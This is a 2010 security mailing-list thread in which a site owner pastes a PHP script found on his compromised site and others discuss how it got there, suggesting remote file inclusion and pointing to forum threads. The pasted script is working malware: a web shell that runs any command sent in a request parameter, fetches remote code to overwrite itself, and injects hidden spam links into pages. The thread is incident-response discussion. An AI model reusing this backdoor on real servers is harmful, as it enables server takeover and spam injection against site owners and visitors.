Well, Dreamhost responded with something that looked like a form letter, pointing out some of the outdated scripts I have on my sites. Thing is, most of those sites are not the ones that were affected, and I have no details on what the vector was. The logs I have access to don't go that far back. I've emailed them back to see if I can get the web logs from the time period when I think the scripts were installed.
Adrian On Mon, Mar 1, 2010 at 2:35 PM, Adrian Crenshaw <[email protected]>wrote: > Googling for the IP "89.149.242.216" and "adsttnmq1" gave me this: > > http://www.phpfreaks.com/forums/index.php?topic=251135.msg1178041#msg1178041 > > Looks like the same person hit this guy. > > Adrian > > > On Mon, Mar 1, 2010 at 2:32 PM, Adrian Crenshaw <[email protected]>wrote: > >> Thanks all. I googled for "adsttnmq1" earlier and found some stuff. >> Looking through my logs, I found an IP of a host making a post to one of the >> URLs in question. Still looking more into what it was doing. >> >> Thanks >> Adrian >> >> >> On Mon, Mar 1, 2010 at 12:12 PM, Andrew Ellis <[email protected]>wrote: >> >>> Historically, I've seen this stuff done through a Remote File Include, >>> tho I can think of a dozen other ways to get it up on your server. I'd >>> probably start by digging through the logs looking for someone >>> including this file in some URL parameter. >>> >>> >>> >>> On Mon, Mar 1, 2010 at 10:31 AM, Jim Halfpenny <[email protected]> >>> wrote: >>> > A search for the string abcdefghiklmnjsweqrtyuiopzx shows a forum >>> > thread with some info on this file: >>> > >>> > http://www.webhostingtalk.com/showthread.php?t=876121 >>> > >>> > I'm sure there are other sources of info out there. Time for some >>> forensic >>> > analysis of your logs to work out how and when this got here. I'm >>> guessing >>> > an automated attack against a known vuln in a PHP app? >>> > >>> > Jim >>> > >>> > On 1 March 2010 09:16, Adrian Crenshaw <[email protected]> wrote: >>> >> >>> >> Ok, I think one of my sites may have been compromised. I found the >>> >> following PHP script on a site, but I'm not sure what it is trying to >>> do. >>> >> Anyone else ever seen this script before? 
>>> >> >>> >> Adrian >>> >> >>> >> <?php >>> >> ignore_user_abort(1); >>> >> set_time_limit(0); >>> >> >>> >> function Clear() >>> >> { >>> >> unlink("c"); >>> >> unlink("1r"); >>> >> unlink("log"); >>> >> } >>> >> >>> >> function Clear2() >>> >> { >>> >> $mrd = trim(file_get_contents("m")); >>> >> $pt = "../$mrd"; >>> >> $fin = file_get_contents($pt); >>> >> $fin = ereg_replace("<adsttnmq1>(.*)<sdioyslkjs2>", "", $fin); >>> >> $fin = ereg_replace("<!--dd4-->(.*)<!--dd5-->", "", $fin); >>> >> $fin = preg_replace('#<a[^>]+\_lm[^>]*>.*?</a>#is', '', $fin); >>> >> $fin = preg_replace("/http(.*?)tmp6(.*?)\<\/a\>/", "", $fin); >>> >> $fin = ereg_replace("<!--dd4-->", "", $fin); >>> >> $fin = ereg_replace("<!--dd5-->", "", $fin); >>> >> $fin = ereg_replace("<font style=\"position: absolute;overflow: >>> >> hidden;height: 0;width: 0\">", "", $fin); >>> >> $fmrd = fopen($pt, "w+"); >>> >> fwrite($fmrd, $fin); >>> >> fclose($fmrd); >>> >> echo " upt-ok"; >>> >> } >>> >> >>> >> function GetVar($name, &$var) >>> >> { >>> >> $var = ""; >>> >> if (isset($_POST[$name])) >>> >> $var = $_POST[$name]; >>> >> >>> >> if (isset($_GET[$name])) >>> >> $var = $_GET[$name]; >>> >> >>> >> if (($var) =="") >>> >> return false; >>> >> else return true; >>> >> } >>> >> >>> >> function Gen() >>> >> { >>> >> $alp = "abcdefghiklmnjsweqrtyuiopzx"; >>> >> $maps = array(); >>> >> if (isset($_POST["sg"])) >>> >> $sg = $_POST["sg"]; >>> >> >>> >> if (isset($_GET["sg"])) >>> >> $sg = $_GET["sg"]; >>> >> >>> >> if (isset($_POST["gm"])) >>> >> $g = $_POST["gm"]; >>> >> >>> >> if (isset($_GET["gm"])) >>> >> $g = $_GET["gm"]; >>> >> >>> >> >>> >> $path = ""; >>> >> $fr = fopen("1r", "a+"); >>> >> if (file_exists("c")) >>> >> { >>> >> $fconf = file("c"); >>> >> $tname = trim($fconf[0]); >>> >> $cname = trim($fconf[1]); >>> >> $curs = trim($fconf[2]); >>> >> $pid = trim($fconf[3]); >>> >> if ($pid == 100) >>> >> { >>> >> $pid = 0; >>> >> $rnd = mt_rand(0, 999); >>> >> $nm = ""; >>> >> for ($i=0; $i<3; $i++) 
>>> >> { >>> >> $ran = mt_rand(0,26); >>> >> $sym = $alp[$ran]; >>> >> $nm = $nm.$sym; >>> >> } >>> >> $cname = $nm; >>> >> mkdir("$tname/$cname"); >>> >> $curs = $g; >>> >> } >>> >> } >>> >> else >>> >> { >>> >> $rnd = mt_rand(0, 999); >>> >> $nm = ""; >>> >> for ($i=0; $i<5; $i++) >>> >> { >>> >> $ran = mt_rand(0,26); >>> >> $sym = $alp[$ran]; >>> >> $nm = $nm.$sym; >>> >> } >>> >> $tname = $nm; >>> >> $pid = 0; >>> >> $curs = $g; >>> >> mkdir($tname); >>> >> $fht = fopen("$tname/.htaccess", "w+"); >>> >> $htname = $sg."2.txt"; >>> >> $fp = fopen($htname, "r"); >>> >> $fin = ''; >>> >> while (!feof($fp)) >>> >> { >>> >> $fc = fgets($fp, 1024); >>> >> if (!$fc) break; >>> >> $fin .= $fc; >>> >> } >>> >> fclose($fp); >>> >> fwrite($fht, $fin); >>> >> fclose($fht); >>> >> $rnd = mt_rand(0, 999); >>> >> $nm = ""; >>> >> for ($i=0; $i<3; $i++) >>> >> { >>> >> $ran = mt_rand(0,26); >>> >> $sym = $alp[$ran]; >>> >> $nm = $nm.$sym; >>> >> } >>> >> $cname = $nm; >>> >> mkdir("$tname/$cname"); >>> >> } >>> >> $gname = $sg."sgen.php"; >>> >> for ($j=$pid; $j<$pid+10; $j++) >>> >> { >>> >> $fp = fopen($gname."?g=$curs", "r"); >>> >> $fin = ''; >>> >> while (!feof($fp)) >>> >> { >>> >> $fc = fgets($fp, 1024); >>> >> if (!$fc) break; >>> >> $fin .= $fc; >>> >> } >>> >> fclose($fp); >>> >> >>> >> $fnd = fopen("$tname/$cname/$curs"."_$j.htm", "w+"); >>> >> fwrite($fnd, $fin); >>> >> fclose($fnd); >>> >> } >>> >> >>> >> if ($j==100) >>> >> { >>> >> $fp = fopen($gname."?g=$curs&m=1", "r"); >>> >> $fin = ''; >>> >> while (!feof($fp)) >>> >> { >>> >> $fc = fgets($fp, 1024); >>> >> if (!$fc) break; >>> >> $fin .= $fc; >>> >> } >>> >> fclose($fp); >>> >> $fnd = fopen("$tname/$cname/$curs"."_lm.htm", "w+"); >>> >> fwrite($fnd, $fin); >>> >> fclose($fnd); >>> >> $map = "$path/$tname/$cname/$curs"."_lm.htm"; >>> >> fwrite($fr,"$map\n"); >>> >> } >>> >> >>> >> $fconf = fopen("c", "w+"); >>> >> fwrite($fconf, $tname."\n"); >>> >> fwrite($fconf, $cname."\n"); >>> >> fwrite($fconf, 
$curs."\n"); >>> >> $nj = $j; >>> >> fwrite($fconf, $nj."\n"); >>> >> fclose($fconf); >>> >> } >>> >> >>> >> function Update() >>> >> { >>> >> $thisname = "1.php"; >>> >> if (isset($_POST['u'])) >>> >> $u = $_POST['u']; >>> >> >>> >> if (isset($_GET['u'])) >>> >> $u = $_GET['u']; >>> >> >>> >> $fp = fopen($u, "r"); >>> >> $fin = ''; >>> >> while (!feof($fp)) >>> >> { >>> >> $fc = fgets($fp, 1024); >>> >> if (!$fc) break; >>> >> $fin .= $fc; >>> >> } >>> >> fclose($fp); >>> >> >>> >> $fthis = fopen($thisname, "w+"); >>> >> fwrite($fthis, $fin); >>> >> fclose($fthis); >>> >> } >>> >> >>> >> function Com() >>> >> { >>> >> if (isset($_POST['c'])) >>> >> @system($_POST['c']); >>> >> if (isset($_GET['c'])) >>> >> @system($_GET['c']); >>> >> } >>> >> >>> >> function UpKos() >>> >> { >>> >> $mrd = trim(file_get_contents("m")); >>> >> $pt = "../$mrd"; >>> >> $fin = file_get_contents($pt); >>> >> $fin = ereg_replace("adsttnmq1", "<adsttnmq1>", $fin); >>> >> $fin = ereg_replace("sdioyslkjs2", "<sdioyslkjs2>", $fin); >>> >> $fmrd = fopen($pt, "w+"); >>> >> fwrite($fmrd, $fin); >>> >> fclose($fmrd); >>> >> } >>> >> >>> >> >>> >> function MRepl() >>> >> { >>> >> $mpt = ""; >>> >> $drs = ""; >>> >> $begtag = "<adsttnmq1><font style=\"position: absolute;overflow: >>> >> hidden;height: 0;width: 0\">"; >>> >> $endtag = "</font></body></html><sdioyslkjs2> "; >>> >> $mrd = trim(file_get_contents("m")); >>> >> $pt = "../$mrd"; >>> >> $fin = file_get_contents($pt); >>> >> GetVar("mpt", $mpt); >>> >> // удаляем завершающие хтмл теги (Russian, mis-encoded cp1251 in the original: "remove the closing html tags") >>> >> $fin = preg_replace ("/<\/body>/i", "", $fin); >>> >> $fin = preg_replace ("/<\/html>/i", "", $fin); >>> >> $fin = ereg_replace("<!--dd4-->(.*)<!--dd5-->", "", $fin); >>> >> $fin = ereg_replace("<adsttnmq1>(.*)<sdioyslkjs2>", "", $fin); >>> >> $fp = fopen($mpt, "r"); >>> >> GetVar("drs", $drs); >>> >> $fin = $fin.$begtag; >>> >> $drs = str_replace("\\", "", $drs); >>> >> $fin = $fin.$drs; >>> >> $fin = $fin.$endtag; >>> >> $fmrd = fopen($pt, "w+"); >>> 
>> fwrite($fmrd, $fin); >>> >> fclose($fmrd); >>> >> } >>> >> >>> >> function Main() >>> >> { >>> >> if (isset($_POST['u']) || isset($_GET['u'])) >>> >> { >>> >> Update(); >>> >> exit(); >>> >> } >>> >> >>> >> if (isset($_POST['c']) || isset($_GET['c'])) >>> >> { >>> >> Com(); >>> >> exit(); >>> >> } >>> >> >>> >> if (isset($_POST['uk']) || isset($_GET['uk'])) >>> >> { >>> >> UpKos(); >>> >> exit(); >>> >> } >>> >> >>> >> if (isset($_POST['g']) || isset($_GET['g'])) >>> >> { >>> >> Gen(); >>> >> exit(); >>> >> } >>> >> >>> >> if (isset($_POST['s']) || isset($_GET['s'])) >>> >> { >>> >> MRepl(); >>> >> exit(); >>> >> } >>> >> >>> >> if (isset($_POST['cl']) || isset($_GET['cl'])) >>> >> { >>> >> Clear(); >>> >> exit(); >>> >> } >>> >> >>> >> if (isset($_POST['cl2']) || isset($_GET['cl2'])) >>> >> { >>> >> Clear2(); >>> >> exit(); >>> >> } >>> >> >>> >> echo "<ok>"; >>> >> >>> >> } >>> >> >>> >> Main(); >>> >> >>> >> ?> >>> >> >>> >> _______________________________________________ >>> >> Pauldotcom mailing list >>> >> [email protected] >>> >> http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom >>> >> Main Web Site: http://pauldotcom.com >>> > >>> > >>> > _______________________________________________ >>> > Pauldotcom mailing list >>> > [email protected] >>> > http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom >>> > Main Web Site: http://pauldotcom.com >>> > >>> >>> >>> >>> -- >>> Andrew Ellis >>> http://blog.psych0tik.net >>> _______________________________________________ >>> Pauldotcom mailing list >>> [email protected] >>> http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom >>> Main Web Site: http://pauldotcom.com >>> >> >> >
_______________________________________________ Pauldotcom mailing list [email protected] http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom Main Web Site: http://pauldotcom.com
